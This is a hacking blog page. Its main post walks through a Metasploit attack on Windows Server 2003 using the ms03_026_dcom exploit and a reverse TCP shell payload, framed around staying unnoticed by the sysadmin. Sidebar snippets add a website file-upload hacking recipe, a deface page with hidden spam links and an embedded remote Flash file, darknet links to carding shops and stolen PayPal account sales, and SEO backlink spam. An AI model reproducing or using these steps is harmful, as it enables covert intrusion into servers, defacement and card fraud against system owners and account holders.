Skip to main content

How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell*

HAX [powered by P2R]:
*How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell*

When I left off on our last hack, we had hacked into the ubiquitous Windows Server 2003 server by adding ourselves as a user to that system so that we can return undetected at any time. The problem with this approach is that a sysadmin who is on their toes will note that a new user has been added and will begin to take preventative action.

I will duly note that in small organizations with a sysadmin who wears multiple hats, the chances of this happening is small in the near term, but certainly when they get around to reviewing their logs, will notice a new user—maybe. Fortunately for us, many of the sysadmins never get around to reviewing their log files until it's too late.

In this new hack, we will attempt to put a command prompt on the Server 2003 that will allow us execute command remotely on the system. Remember in our previous hack when we added ourselves as a user? I noted that that particular exploit could be used multiple times in Windows XP, but only once in Server 2003. After that, each new attempt to exploit will tend to crash the system and there is no sysadmin who won't notice that! So, we will need to use a different exploit to secretly get into that same Windows Server 2003 box and implant a command prompt.

Okay, boot up your Linux machine and fire up the Metasploit console and let's start rocking that 2003 box!

Your startup screen should look like this:
Step 1Find an Exploit

Now let's search for an appropriate exploit to hack into that 2003 system. Let's type:

msf> search platform:windows type:exploit

This should give us the list of exploits that we can use against Windows systems. In my Metasploit system, it returned numerous exploits as seen below.
Step 2Pick Your Favorite

Let's choose a tried and true exploit that is almost always successful against Windows Server 2003, exploit /windows/dcerpc/ms03_026_dcom. Type:

msf > use exploit/windows/dcerpc/ms03_026_dcom

To get more info on this exploit, let's type:

msf exploit (ms03_26_dcom) info

Notice from the info output, that this exploit works against Windows NT, 2000, XP and 2003. Great! Let's use it against that Windows 2003 machine we have been targeting.
Step 3Check Your Options

To starting exploiting that Windows Server 2003, we first need to check our options. Type:

msf > show options

Note that we need to set the RHOST or remote host of the system we are exploiting. In my case, that is 192.168.1.100 (yours will likely different). So we set our RHOST to 192.168.1.100

msf > set RHOST 192.168.1.100
Step 4Show Payloads

Next, we need to set the payload to exploit the Windows Server 2003 system. In our case, we will looking to put a command shell on the server system so that we can control it remotely and discretely. We could send something like a VNC payload where we could get a GUI of the system, but that would likely be noticed by the system admin as he sees his mouse moving around his screen. We will use a VNC payload in a future hack.

So, to see what payloads are available to us, we simply need to type show payloads and Metasploit will list all the payloads available for this exploit.

msf > show payloads
Step 5Connect

See the payload near the top named windows/shell_reverse_tcp? That's the one we want to use. It will connect to the Windows Server 2003 box and return us a command shell for remotely controlling the victim system. Type:

msf > set PAYLOAD windows/shell_reverse_tcp
Step 6Set Payload Options

Now that we have set the exploit and the payload, the only thing left to do is set the options on the payload. Type:

msf > show options

As you can see from the screenshot above, this payload requires that we set the LHOST or local host. In other words, we need to tell the payload what system we want the command shell to connect back to. That would be us! So, give it your IP address. Mine is 192.168.1.111, so I typed:

msf > set LHOST 192.168.1.111
Step 7Pwning!

Now it's time to pwn that box! Simply type exploit:

Labels:

Comments

Post a Comment

Popular posts from this blog

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS http://answers.microsoft.com/en-us http://archiveoflinks.com / http://community.sitepoint.com / http://de.lirio.us / http://del.icio.us / http://dondir.com / http://filesharingtalk.com / http://forum.deviantart.com / http://forum.joomla.org / http://forums.cnet.com / http://forums.hostgator.com / http://forums.mysql.com / http://forums.searchenginewatch.com / http://simplemachines.org/community/index.php http://www.247webdirectory.com / http://www.2daydir.com / http://www.9dir.com/Submit http://www.9sites.net / http://www.9w1.net / http://www.a1webdirectory.org / http://www.abacusseo.com / http://www.abc-directory.com / http://www.abigdir.com / http://www.acewebdirectory.com / http://www.add2us.com / http://www.addbusiness.net / http://www.addlink.us / http://www.addlinkzfree.com / http://www.addsite.info / http://www.afreeurl.info / http://www.agrieducation.org / http://www.alistdirectory.com / http...
Post a Comment
Read more
200++ high pr eductinon&goverment site backline As We know how important backlinks are for rankings in Google for a blog/site and page rank which definitely is the trusted way to show how well your blog is which most advertiser look for.I have come up with top .gov & .edu website by registering where you can get backlinks easily.Sograb these backlinsk and see the magic how  your website ranks on Google with these high PR boosting .gov and .edu backlinks.A high quality backlinks worth thousands low quality backlinks, especially the one coming fromedu and .gov sites. Google loves backlinks from.edu & .gov sites and thus give your site good ranking in SERPs. An edu & .’gov backlinks is associated with an educational institute & government organization therefore considered asmost authentic and valued backlink in term of SEO because they are from non-profit source givequality information, not a spam one and since exists for long time in the field, have high ...
Post a Comment
Read more

How to Hack Website

inurl:/editor/editor/filemanager Just open uploadtest.html Or test.html Then select PHP server Upload file Copy uploaded file url Paste it after the link Www.xyz.com //.... Enjoy Regards :- HACKER 22385
Post a Comment
Read more

Abdul hacker deface page

Abdul hacker deface page     <EMBED src=" http://greencall.co.kr/.p/we_will_not_go_down.swf " type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">     <html>         <body onload="scrlsts()"><script type="text/javascript"> document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1946px; t' + 'op' + ': -2856px;" class="sufoxyyhvnyswxs15">'); </script> <a href=" http://cergyd7.dev2.cmantika.com/includes/index.php ">installment loans california bad credit</a> <a href=" http://www.diamondwares.net/logs/index.php ">online cash loan direct lenders</a> <a href=" http://armastroy.com/templates/index.php ">easy loan kota kinabalu</a> <a href=" http://www.magazinecambodia.com/templates/index....
Post a Comment
Read more

Blogs on Computer Security:

Blogs on Computer Security: https://antelox.blogspot.com / http://www.dumpanalysis.org/blog / http://www.abuse.ch / http://zairon.wordpress.com / http://androguard.blogspot.com / http://blog.w4kfu.com / http://akhenath0n.blogspot.com / http://diarrlf.wordpress.com / http://deobfuscated.blogspot.com / http://www.h-i-r.net / http://mysterie.fr/blog / http://www.skullsecurity.org/blog / http://www.wrgross.com/blogs/security / http://net-effects.blogspot.com / http://eiploader.wordpress.com / http://cyb3rsleuth.blogspot.com / http://0entropy.blogspot.com / http://siri-urz.blogspot.com / http://newsoft-tech.blogspot.com / http://www.ragestorm.net/blogs / http://codeexploration.blogspot.com / http://esploit.blogspot.com / http://thexploit.com / http://mysterie.fr/blog / http://bailey.st/blog / http://touchmymalware.blogspot.ru / http://blog.delroth.net / http://novahackers.blogspot.com / http://greatis.com/blog / http://mcdermottcybersecurity.com / http://grand...
1 comment
Read more

Various Forums

JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali   http://www.kali.org/  http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails  http://distrowatch.com/tails  https://tails.boum.org/  https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace...
Post a Comment
Read more

Darkweb and Deepweb llinks latest 2017 Huge collection!!!!

hi guys... as u know deep web and darkweb is most dangeorus part of the internet... but without site link....what where will u surf it ... so i did some reasearch and get the collection.... hope u like it.. Gonzalo Nuñez: 1. Xillia (was legit back in the day on markets) http://cjgxp5lockl6aoyg.onion 2. http://cjgxp5lockl6aoyg.onion/worldwide-cardable-sites-by-alex 3. http://cjgxp5lockl6aoyg.onion/selling-paypal-accounts-with-balance-upto-5000dollars 4. http://cjgxp5lockl6aoyg.onion/cloned-credit-cards-free-shipping 5. 6. ——————————————————————————————- 7. 8. 9. UNSORTED 10. 11. Amberoad http://amberoadychffmyw.onion 12. KognitionsKyrkan http://wd43uqrbjwe6hpre.onion 13. Malina http://malina2ihfyawiau.onion 14. BB Compendium http://jq.26zp5ygkpszripvv.onion 15. Hackbb pages index (cauti...
Post a Comment
Read more

hacking tools and lab

Resources (Free) Virtual Networks (VPNs) • ChaosVPN: http://wiki.hamburg.ccc.de/ChaosVPN • Gh0st Networks: http://www.gh0st.net / • Hacking Lab: https://www.hacking-lab.com / • p0wnlabs: http://p0wnlabs.com / • pwn0: https://pwn0.com / • PentestIT: https://lab.pentestit.ru / Custom Personal Targets • Hack A Server: https://hackaserver.com / • Hack Me: http://hack.me / • Hack This: https://www.hackthis.co.uk / • Smash The Stack: http://smashthestack.org / • Hack The Box: https://www.hackthebox.gr / • SecAdvise: https://labs.secadvise.com / • DarkHive: http://darkhive.net / • Avatao: https://avatao.com / • Root-Me: https://www.root-me.org / Archive/Repository • Security Conference Library: http://archive.liquidmatrix.org / • Shell-Storm.org Repository: http://repo.shell-storm.org/CTF / Misc • Bug crowd: ht...
4 comments
Read more

open a new bitcoin account and made double money

open a new bitcoin account and made double money MenuAbout UsContact Us Privacy Policy Disclaimer Sitemap  Main MenuBlogging tipsBlog designing  Blog traffic How TosMake Money Online  How to open a bitcoin account, earn, double your earnings and withdraw your money to physical cash. Bloggers Prof 11:12:00 AM  4 I recently discovered that people are now interested in bitcoin because of its high rate of popularity now in telegram, but nevertheless, I would be talking today on  how to get money into your bitcoin wallet  and how to go about your funds, weather you would withdraw it or you sell it to someone, I talked about everything you need to know about bitcoin and how to create your wallet, create your wallet let's move to today's deal. There are many ways to get  money into your wallet,   you can buy and you can also earn it , I want to show you list of sites you can earn bits from fast, Afte...
Post a Comment
Read more

Tor Darkweb Link

Tor link max telegram big acker: https://cardedlxzxsphu5y.onion/ SHOP FOR BUYING CARDED PRODUCTS https://2or24opd2hkebadv.onion/index.php  TORBAY FORUM chickencaptain: http://kpynyvym6xqi7wz2.onion/ parazite files and links max telegram big acker: https://kr5hou2zh4qtebqk.onion.cab/ezines/ ARCHIEVE OF SOME VINTAGE AS WELL AS NEW STUFFS https://superkuhbitj6tul.onion/library/ LIBRARY OF BOOKS ON VARIOUS TOPICS https://yuxv6qujajqvmypv.onion/ GUIDE ON USING AN SECURE OPERATING SYSTEM https://bpo4ybbs2apk4sk4.onion/en A COLLECTION OF TOOLS RELATED TO SECURITY P4RN3R: https://ondemand5xot4hdw.onion/  Tor On Demand max telegram big acker: https://f3mnl42ax3qtu3a7.onion/ GOVT LEAKS https://kzspryu63qbjfncp.onion/  DIGITAL PAWN SHOP https://yniir5c6cmuwslfl.onion/ STRANGE WEBSITE, CANT DESCRIBE https://vrimutd6so6a565x.onion.cab/index.php/Board ANONYMOUS POSTING https://h2am5w5ufhvdifrs.onion/ CRYPTOME ARCHIVE OF GOV CONSPIRACY FILES https://torc5bhzq6xorhb4.o...
Post a Comment
Read more